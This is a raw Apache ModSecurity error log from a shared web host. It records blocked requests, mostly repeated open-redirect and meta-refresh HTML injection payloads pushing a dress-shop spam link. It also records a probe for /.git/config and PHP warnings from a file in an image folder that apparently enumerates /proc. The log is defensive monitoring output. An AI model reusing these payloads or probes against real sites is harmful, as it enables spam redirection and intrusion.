[Tue May 12 02:15:15.289976 2026] [security2:error] [pid 1730175:tid 1730189] [client 162.62.213.165:35018] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/chat-bot/"] [unique_id "agJxE3o6NvB9WXx5V-5zjAAAAQw"]
[Tue May 12 02:15:49.661492 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:58373] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxNXo6NvB9WXx5V-5znwAAAQ0"]
[Tue May 12 02:15:49.661924 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:58373] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxNXo6NvB9WXx5V-5znwAAAQ0"]
[Tue May 12 02:15:49.664920 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:58373] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxNXo6NvB9WXx5V-5znwAAAQ0"]
[Tue May 12 02:15:49.665039 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:58373] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxNXo6NvB9WXx5V-5znwAAAQ0"]
[Tue May 12 02:15:49.665233 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:58373] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxNXo6NvB9WXx5V-5znwAAAQ0"]
[Tue May 12 02:15:49.665664 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:58373] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxNXo6NvB9WXx5V-5znwAAAQ0"]
[Tue May 12 02:15:49.665969 2026] [security2:error] [pid 1730175:tid 1730190] [client 27.78.84.116:58373] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxNXo6NvB9WXx5V-5znwAAAQ0"]
[Tue May 12 02:16:07.549832 2026] [security2:error] [pid 1730175:tid 1730191] [client 35.246.37.254:60796] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.git/config"] [unique_id "agJxR3o6NvB9WXx5V-5zogAAAQ4"]
[Tue May 12 02:16:07.550051 2026] [security2:error] [pid 1730175:tid 1730191] [client 35.246.37.254:60796] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.git/config"] [unique_id "agJxR3o6NvB9WXx5V-5zogAAAQ4"]
[Tue May 12 02:16:07.550312 2026] [security2:error] [pid 1730175:tid 1730191] [client 35.246.37.254:60796] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.git/config"] [unique_id "agJxR3o6NvB9WXx5V-5zogAAAQ4"]
PHP Warning:  filesize(): stat failed for /proc/1705356/task/1705356/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705356/task/1705356/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705356/task/1705356/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705356/task/1705356/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705356/task/1705356/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705356/task/1705356/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:16:34.077449 2026] [security2:error] [pid 1730175:tid 1730187] [client 27.78.84.116:59604] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxYno6NvB9WXx5V-5zsQAAAQo"]
[Tue May 12 02:16:34.077859 2026] [security2:error] [pid 1730175:tid 1730187] [client 27.78.84.116:59604] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxYno6NvB9WXx5V-5zsQAAAQo"]
[Tue May 12 02:16:34.078012 2026] [security2:error] [pid 1730175:tid 1730187] [client 27.78.84.116:59604] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxYno6NvB9WXx5V-5zsQAAAQo"]
[Tue May 12 02:16:34.078104 2026] [security2:error] [pid 1730175:tid 1730187] [client 27.78.84.116:59604] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxYno6NvB9WXx5V-5zsQAAAQo"]
[Tue May 12 02:16:34.078284 2026] [security2:error] [pid 1730175:tid 1730187] [client 27.78.84.116:59604] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxYno6NvB9WXx5V-5zsQAAAQo"]
[Tue May 12 02:16:34.078705 2026] [security2:error] [pid 1730175:tid 1730187] [client 27.78.84.116:59604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxYno6NvB9WXx5V-5zsQAAAQo"]
[Tue May 12 02:16:34.079025 2026] [security2:error] [pid 1730175:tid 1730187] [client 27.78.84.116:59604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxYno6NvB9WXx5V-5zsQAAAQo"]
[Tue May 12 02:16:51.444616 2026] [core:error] [pid 1707624:tid 1707696] [client 34.222.186.175:58546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:16:51.444658 2026] [core:error] [pid 1707624:tid 1707696] [client 34.222.186.175:58546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 02:17:08.314651 2026] [security2:error] [pid 1695975:tid 1695995] [client 27.78.84.116:60762] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxhNVI9ymHBxup74-GhQAAAJE"]
[Tue May 12 02:17:08.315351 2026] [security2:error] [pid 1695975:tid 1695995] [client 27.78.84.116:60762] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxhNVI9ymHBxup74-GhQAAAJE"]
[Tue May 12 02:17:08.315740 2026] [security2:error] [pid 1695975:tid 1695995] [client 27.78.84.116:60762] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxhNVI9ymHBxup74-GhQAAAJE"]
[Tue May 12 02:17:08.315853 2026] [security2:error] [pid 1695975:tid 1695995] [client 27.78.84.116:60762] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxhNVI9ymHBxup74-GhQAAAJE"]
[Tue May 12 02:17:08.316038 2026] [security2:error] [pid 1695975:tid 1695995] [client 27.78.84.116:60762] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJxhNVI9ymHBxup74-GhQAAAJE"]
